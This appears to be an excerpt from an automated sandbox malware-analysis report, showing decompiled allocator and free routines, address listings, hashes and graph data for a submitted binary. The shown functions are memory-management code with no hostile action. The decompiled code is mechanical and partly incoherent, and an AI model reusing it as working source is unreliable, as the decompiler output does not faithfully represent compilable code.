							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x2191720 + _t142 * 4;
								 *_t80 =  *(0x2191720 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x219171c], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E02171530(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x2191710 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x21915b8) & 0x000000ff;
					__ebx = 0x2190044 + ( *(__edx + 0x21915b8) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x2191045;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x2191710], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x2191710], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x219171c;
							__eflags =  *(__ebx + 1) &  *0x219171c;
							if(( *(__ebx + 1) &  *0x219171c) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x2191718; // 0x4fcd0
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E021715FC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x2191710 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x2191714; // 0x4a7fce0
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x2191718 =  *0x2191718 - __edi;
									 *0x2191714 = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x2191720 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x2191720 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x21917a0 + ( *(0x2191720 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x2191720 + __eax * 4;
									 *_t38 =  *(0x2191720 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x219171c], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E02171530(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0x4fcd6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x2191710 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x4a7fd00
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                                                0x02171760
                                                                                                0x02171766
                                                                                                0x02171998
                                                                                                0x0217199d
                                                                                                0x02171ab0
                                                                                                0x02171ab1
                                                                                                0x02171ab3
                                                                                                0x021716b4
                                                                                                0x021716b8
                                                                                                0x021716c4
                                                                                                0x021716d4
                                                                                                0x021716d9
                                                                                                0x021716dd
                                                                                                0x021716df
                                                                                                0x021716e1
                                                                                                0x021716e7
                                                                                                0x021716ea
                                                                                                0x021716ef
                                                                                                0x021716f4
                                                                                                0x021716fa
                                                                                                0x02171700
                                                                                                0x02171703
                                                                                                0x02171705
                                                                                                0x0217170c
                                                                                                0x0217170c
                                                                                                0x02171715
                                                                                                0x02171ab9
                                                                                                0x02171ab9
                                                                                                0x02171abb
                                                                                                0x02171abb
                                                                                                0x021719a3
                                                                                                0x021719af
                                                                                                0x021719b2
                                                                                                0x021719b4
                                                                                                0x02171968
                                                                                                0x0217196d
                                                                                                0x02171975
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171979
                                                                                                0x02171983
                                                                                                0x0217198b
                                                                                                0x0217198f
                                                                                                0x00000000
                                                                                                0x0217198f
                                                                                                0x00000000
                                                                                                0x0217198b
                                                                                                0x02171968
                                                                                                0x021719b6
                                                                                                0x021719b6
                                                                                                0x021719be
                                                                                                0x021719c1
                                                                                                0x021719cb
                                                                                                0x021719cb
                                                                                                0x021719d2
                                                                                                0x021719e5
                                                                                                0x021719e9
                                                                                                0x021719ef
                                                                                                0x02171a08
                                                                                                0x02171a0e
                                                                                                0x02171a0e
                                                                                                0x02171a10
                                                                                                0x02171a2e
                                                                                                0x02171a12
                                                                                                0x02171a12
                                                                                                0x02171a17
                                                                                                0x02171a19
                                                                                                0x02171a1e
                                                                                                0x02171a27
                                                                                                0x02171a27
                                                                                                0x02171a33
                                                                                                0x02171a3b
                                                                                                0x021719f1
                                                                                                0x021719f1
                                                                                                0x021719fb
                                                                                                0x02171a03
                                                                                                0x00000000
                                                                                                0x02171a03
                                                                                                0x021719d4
                                                                                                0x021719d7
                                                                                                0x021719da
                                                                                                0x02171a3c
                                                                                                0x02171a3c
                                                                                                0x02171a3d
                                                                                                0x02171a3e
                                                                                                0x02171a45
                                                                                                0x02171a48
                                                                                                0x02171a4b
                                                                                                0x02171a4e
                                                                                                0x02171a50
                                                                                                0x02171a52
                                                                                                0x02171a59
                                                                                                0x02171a5b
                                                                                                0x02171a5b
                                                                                                0x02171a5b
                                                                                                0x02171a62
                                                                                                0x02171a64
                                                                                                0x02171a64
                                                                                                0x02171a62
                                                                                                0x02171a70
                                                                                                0x02171a75
                                                                                                0x02171a75
                                                                                                0x02171a77
                                                                                                0x02171a98
                                                                                                0x02171a98
                                                                                                0x02171a98
                                                                                                0x02171a79
                                                                                                0x02171a79
                                                                                                0x02171a7f
                                                                                                0x02171a82
                                                                                                0x02171a86
                                                                                                0x02171a8c
                                                                                                0x02171a8e
                                                                                                0x02171a8e
                                                                                                0x02171a8c
                                                                                                0x02171aa0
                                                                                                0x02171aa3
                                                                                                0x02171aaf
                                                                                                0x02171aaf
                                                                                                0x021719d2
                                                                                                0x0217176c
                                                                                                0x0217176c
                                                                                                0x0217176e
                                                                                                0x02171775
                                                                                                0x0217177c
                                                                                                0x021717d4
                                                                                                0x021717d4
                                                                                                0x021717d9
                                                                                                0x021717dd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021717df
                                                                                                0x021717df
                                                                                                0x021717e2
                                                                                                0x021717e7
                                                                                                0x021717eb
                                                                                                0x021717ed
                                                                                                0x021717ed
                                                                                                0x021717f0
                                                                                                0x021717f5
                                                                                                0x021717f9
                                                                                                0x021717fb
                                                                                                0x021717fb
                                                                                                0x02171800
                                                                                                0x02171805
                                                                                                0x0217180a
                                                                                                0x0217180e
                                                                                                0x02171816
                                                                                                0x00000000
                                                                                                0x02171816
                                                                                                0x0217180e
                                                                                                0x021717f9
                                                                                                0x00000000
                                                                                                0x021717eb
                                                                                                0x021717d4
                                                                                                0x0217177e
                                                                                                0x0217177e
                                                                                                0x02171781
                                                                                                0x02171784
                                                                                                0x02171789
                                                                                                0x0217178b
                                                                                                0x021717a4
                                                                                                0x021717a7
                                                                                                0x021717ab
                                                                                                0x021717ad
                                                                                                0x021717b0
                                                                                                0x02171820
                                                                                                0x02171821
                                                                                                0x02171822
                                                                                                0x02171829
                                                                                                0x0217182b
                                                                                                0x0217182b
                                                                                                0x02171830
                                                                                                0x02171838
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217183c
                                                                                                0x02171841
                                                                                                0x02171846
                                                                                                0x0217184e
                                                                                                0x02171852
                                                                                                0x00000000
                                                                                                0x02171852
                                                                                                0x00000000
                                                                                                0x0217184e
                                                                                                0x0217182b
                                                                                                0x0217185c
                                                                                                0x02171860
                                                                                                0x02171860
                                                                                                0x02171866
                                                                                                0x021718d8
                                                                                                0x021718dc
                                                                                                0x021718e2
                                                                                                0x021718e4
                                                                                                0x0217190c
                                                                                                0x02171910
                                                                                                0x02171912
                                                                                                0x02171917
                                                                                                0x02171919
                                                                                                0x0217191b
                                                                                                0x00000000
                                                                                                0x0217191d
                                                                                                0x0217191d
                                                                                                0x02171922
                                                                                                0x02171924
                                                                                                0x02171925
                                                                                                0x02171926
                                                                                                0x02171927
                                                                                                0x02171927
                                                                                                0x021718e6
                                                                                                0x021718e6
                                                                                                0x021718ec
                                                                                                0x021718f0
                                                                                                0x021718f6
                                                                                                0x021718f8
                                                                                                0x021718fa
                                                                                                0x021718fa
                                                                                                0x021718fc
                                                                                                0x021718fe
                                                                                                0x02171904
                                                                                                0x00000000
                                                                                                0x02171904
                                                                                                0x02171868
                                                                                                0x02171868
                                                                                                0x0217186b
                                                                                                0x02171872
                                                                                                0x02171879
                                                                                                0x0217187c
                                                                                                0x0217187f
                                                                                                0x02171886
                                                                                                0x02171889
                                                                                                0x0217188c
                                                                                                0x0217188f
                                                                                                0x02171891
                                                                                                0x02171893
                                                                                                0x02171895
                                                                                                0x0217189a
                                                                                                0x0217189c
                                                                                                0x0217189c
                                                                                                0x0217189c
                                                                                                0x021718a3
                                                                                                0x021718a5
                                                                                                0x021718a5
                                                                                                0x021718a3
                                                                                                0x021718ac
                                                                                                0x021718b1
                                                                                                0x021718b4
                                                                                                0x021718ba
                                                                                                0x02171928
                                                                                                0x02171928
                                                                                                0x02171928
                                                                                                0x021718bc
                                                                                                0x021718bc
                                                                                                0x021718be
                                                                                                0x021718c2
                                                                                                0x021718c4
                                                                                                0x021718c7
                                                                                                0x021718ca
                                                                                                0x021718cd
                                                                                                0x021718d1
                                                                                                0x021718d1
                                                                                                0x0217192d
                                                                                                0x0217192d
                                                                                                0x0217192d
                                                                                                0x02171930
                                                                                                0x02171933
                                                                                                0x02171935
                                                                                                0x0217193a
                                                                                                0x0217193c
                                                                                                0x0217193f
                                                                                                0x02171946
                                                                                                0x02171949
                                                                                                0x02171949
                                                                                                0x0217194c
                                                                                                0x02171950
                                                                                                0x02171953
                                                                                                0x02171956
                                                                                                0x02171958
                                                                                                0x02171958
                                                                                                0x0217195a
                                                                                                0x0217195d
                                                                                                0x02171960
                                                                                                0x02171963
                                                                                                0x02171964
                                                                                                0x02171965
                                                                                                0x02171966
                                                                                                0x02171966
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b6
                                                                                                0x021717b9
                                                                                                0x021717bc
                                                                                                0x021717bf
                                                                                                0x021717c0
                                                                                                0x021717c0
                                                                                                0x0217178d
                                                                                                0x0217178d
                                                                                                0x02171791
                                                                                                0x02171791
                                                                                                0x02171794
                                                                                                0x02171797
                                                                                                0x0217179a
                                                                                                0x021717c4
                                                                                                0x021717c7
                                                                                                0x021717ca
                                                                                                0x021717cd
                                                                                                0x021717d0
                                                                                                0x021717d1
                                                                                                0x0217179c
                                                                                                0x0217179c
                                                                                                0x0217179f
                                                                                                0x021717a0
                                                                                                0x021717a0
                                                                                                0x0217179a
                                                                                                0x0217178b

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 02171800
                                                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02171816
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: e152b5d178c74bc91aa123ad5b31e2dd9c074c42e9353793cb1d4153c34712c4
                                                                                                • Instruction ID: a862c91122a91cff800dca998546077c970015a486fdc89bbc96897ca787a23c
                                                                                                • Opcode Fuzzy Hash: e152b5d178c74bc91aa123ad5b31e2dd9c074c42e9353793cb1d4153c34712c4
                                                                                                • Instruction Fuzzy Hash: D3B12276A80252AFC719CF68D480356BBF2FBC5310F1886AED45D8B385C77195D2CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02171ABC Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6274 2171abc-2171acb 6275 2171ad1-2171ad5 6274->6275 6276 2171b9c-2171b9f 6274->6276 6277 2171ad7-2171ade 6275->6277 6278 2171b38-2171b41 6275->6278 6279 2171ba5-2171baf 6276->6279 6280 2171c8c-2171c90 6276->6280 6283 2171ae0-2171aeb 6277->6283 6284 2171b0c-2171b0e 6277->6284 6278->6277 6287 2171b43-2171b57 Sleep 6278->6287 6281 2171bb1-2171bbd 6279->6281 6282 2171b6c-2171b79 6279->6282 6285 2171c96-2171c9b 6280->6285 6286 2171718-217173b call 2171674 VirtualFree 6280->6286 6288 2171bf4-2171c02 6281->6288 6289 2171bbf-2171bc2 6281->6289 6282->6281 6296 2171b7b-2171b8f Sleep 6282->6296 6290 2171af4-2171b09 6283->6290 6291 2171aed-2171af2 6283->6291 6292 2171b23 6284->6292 6293 2171b10-2171b21 6284->6293 6305 2171746 6286->6305 6306 217173d-2171744 6286->6306 6287->6277 6295 2171b5d-2171b68 Sleep 6287->6295 6297 2171bc6-2171bca 6288->6297 6299 2171c04-2171c09 call 21714f0 6288->6299 6289->6297 6298 2171b26-2171b33 6292->6298 6293->6292 6293->6298 6295->6278 6296->6281 6301 2171b91-2171b98 Sleep 6296->6301 6302 2171c0c-2171c19 6297->6302 6303 2171bcc-2171bd2 6297->6303 6298->6279 6299->6297 6301->6282 6302->6303 6310 2171c1b-2171c22 call 21714f0 6302->6310 6307 2171c24-2171c2e 6303->6307 6308 2171bd4-2171bf2 call 2171530 6303->6308 6311 2171749-2171753 6305->6311 6306->6311 6312 2171c30-2171c58 VirtualFree 6307->6312 6313 2171c5c-2171c89 call 2171590 6307->6313 6310->6303
                                                                                                C-Code - Quality: 91%
                                                                                                			E02171ABC(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x2191045; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E02171674();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x21937a0 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x2191045; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x2191710], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x2191710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E021714F0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E021714F0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x2191718 - 0x13fff0;
							if( *0x2191718 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E02171590(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x2191718 = 0x13fff0;
								 *0x2191714 = _t70;
								 *0x2191710 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x2191710 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E02171530(_t87, _t76, _t69);
							 *0x2191710 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}






















                                                                                                0x02171abc
                                                                                                0x02171abc
                                                                                                0x02171ac5
                                                                                                0x02171acb
                                                                                                0x02171b9c
                                                                                                0x02171b9f
                                                                                                0x02171c8c
                                                                                                0x02171c8d
                                                                                                0x02171c90
                                                                                                0x02171c9b
                                                                                                0x02171718
                                                                                                0x02171718
                                                                                                0x0217171d
                                                                                                0x02171720
                                                                                                0x02171725
                                                                                                0x02171727
                                                                                                0x02171729
                                                                                                0x02171734
                                                                                                0x0217173b
                                                                                                0x02171746
                                                                                                0x02171746
                                                                                                0x0217173d
                                                                                                0x0217173d
                                                                                                0x0217173f
                                                                                                0x02171742
                                                                                                0x02171742
                                                                                                0x02171749
                                                                                                0x02171753
                                                                                                0x02171753
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171ad1
                                                                                                0x02171ad1
                                                                                                0x02171ad3
                                                                                                0x02171ad5
                                                                                                0x02171b38
                                                                                                0x02171b38
                                                                                                0x02171b3d
                                                                                                0x02171b41
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171b47
                                                                                                0x02171b4c
                                                                                                0x02171b4d
                                                                                                0x02171b4e
                                                                                                0x02171b53
                                                                                                0x02171b57
                                                                                                0x02171b61
                                                                                                0x02171b66
                                                                                                0x02171b67
                                                                                                0x00000000
                                                                                                0x02171b67
                                                                                                0x00000000
                                                                                                0x02171b57
                                                                                                0x02171b38
                                                                                                0x02171ad7
                                                                                                0x02171ad7
                                                                                                0x02171ad7
                                                                                                0x02171ad7
                                                                                                0x02171adb
                                                                                                0x02171ade
                                                                                                0x02171b0c
                                                                                                0x02171b0e
                                                                                                0x02171b23
                                                                                                0x02171b23
                                                                                                0x02171b10
                                                                                                0x02171b10
                                                                                                0x02171b13
                                                                                                0x02171b16
                                                                                                0x02171b19
                                                                                                0x02171b1c
                                                                                                0x02171b1e
                                                                                                0x02171b21
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171b21
                                                                                                0x02171b26
                                                                                                0x02171b28
                                                                                                0x02171b2a
                                                                                                0x02171b2d
                                                                                                0x02171ba5
                                                                                                0x02171ba8
                                                                                                0x02171baa
                                                                                                0x02171bac
                                                                                                0x02171bad
                                                                                                0x02171baf
                                                                                                0x02171b6c
                                                                                                0x02171b6c
                                                                                                0x02171b71
                                                                                                0x02171b79
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171b7d
                                                                                                0x02171b82
                                                                                                0x02171b87
                                                                                                0x02171b8f
                                                                                                0x02171b93
                                                                                                0x00000000
                                                                                                0x02171b93
                                                                                                0x00000000
                                                                                                0x02171b8f
                                                                                                0x02171b6c
                                                                                                0x02171bb1
                                                                                                0x02171bb1
                                                                                                0x02171bb9
                                                                                                0x02171bbd
                                                                                                0x02171bf4
                                                                                                0x02171bf7
                                                                                                0x02171bfa
                                                                                                0x02171bfc
                                                                                                0x02171c02
                                                                                                0x02171c04
                                                                                                0x02171c04
                                                                                                0x02171bbf
                                                                                                0x02171bbf
                                                                                                0x02171bbf
                                                                                                0x02171bc2
                                                                                                0x02171bc2
                                                                                                0x02171bc6
                                                                                                0x02171bca
                                                                                                0x02171c0c
                                                                                                0x02171c0f
                                                                                                0x02171c11
                                                                                                0x02171c13
                                                                                                0x02171c19
                                                                                                0x02171c1d
                                                                                                0x02171c1d
                                                                                                0x02171c19
                                                                                                0x02171bcc
                                                                                                0x02171bd2
                                                                                                0x02171c24
                                                                                                0x02171c2e
                                                                                                0x02171c5c
                                                                                                0x02171c62
                                                                                                0x02171c67
                                                                                                0x02171c6e
                                                                                                0x02171c78
                                                                                                0x02171c7e
                                                                                                0x02171c85
                                                                                                0x02171c89
                                                                                                0x02171c30
                                                                                                0x02171c30
                                                                                                0x02171c33
                                                                                                0x02171c35
                                                                                                0x02171c38
                                                                                                0x02171c3b
                                                                                                0x02171c3d
                                                                                                0x02171c4c
                                                                                                0x02171c51
                                                                                                0x02171c54
                                                                                                0x02171c58
                                                                                                0x02171c58
                                                                                                0x02171bd4
                                                                                                0x02171bd7
                                                                                                0x02171bda
                                                                                                0x02171be2
                                                                                                0x02171be7
                                                                                                0x02171bee
                                                                                                0x02171bf2
                                                                                                0x02171bf2
                                                                                                0x02171ae0
                                                                                                0x02171ae0
                                                                                                0x02171ae2
                                                                                                0x02171ae8
                                                                                                0x02171aeb
                                                                                                0x02171af4
                                                                                                0x02171af7
                                                                                                0x02171afa
                                                                                                0x02171afd
                                                                                                0x02171b00
                                                                                                0x02171b03
                                                                                                0x02171b06
                                                                                                0x02171b06
                                                                                                0x02171b08
                                                                                                0x02171b09
                                                                                                0x02171aed
                                                                                                0x02171aed
                                                                                                0x02171aed
                                                                                                0x02171aef
                                                                                                0x02171af1
                                                                                                0x02171af2
                                                                                                0x02171af2
                                                                                                0x02171aeb
                                                                                                0x02171ade

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?), ref: 02171B47
                                                                                                • Sleep.KERNEL32(0000000A,00000000,?), ref: 02171B61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 8e47c8b5930edce53df063783d115a213fe51c6e5ac19934e942b2fd61e48dbc
                                                                                                • Instruction ID: a20a41880118ee0f91d9e6d9bdda8f3ed0d08ca453e43bf3f48989bfbd9a3b86
                                                                                                • Opcode Fuzzy Hash: 8e47c8b5930edce53df063783d115a213fe51c6e5ac19934e942b2fd61e48dbc
                                                                                                • Instruction Fuzzy Hash: A251D071694241AFD729CF6CD984756BBF5ABC5314F2886AED84CCB382E7B0C484CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021735DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

